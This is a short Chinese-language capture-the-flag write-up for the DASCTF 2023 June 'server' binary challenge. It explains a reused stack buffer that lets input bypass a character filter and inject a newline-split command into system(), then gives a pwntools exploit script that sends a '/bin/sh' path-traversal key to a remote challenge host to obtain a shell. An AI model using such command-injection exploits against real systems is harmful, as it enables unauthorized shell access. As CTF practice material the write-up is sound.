DASCTF 2023六月挑战赛 二进制专项 server
两个函数的rbp - 0x40这里是重复使用的,漏洞点出在system可以执行输入的,14DA过滤字符,但是可以复用空间,然后\n分割命令即可
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn_7'
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 1
if debug:
r = remote('node4.buuoj.cn', 25959)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
def dbgg():
raw_input()
menu = 'Your choice >> '
def diff(key):
r.sendlineafter(menu, '1')
r.sendlineafter('Please input the key of admin : ', key)
def sys(p):
r.sendlineafter(menu, '2')
r.sendlineafter('Please input the username to add : \n', p)
dbgg()
diff('../../../../../..//bin/sh')
p1 = b"'\n"
sys(p1)
r.interactive()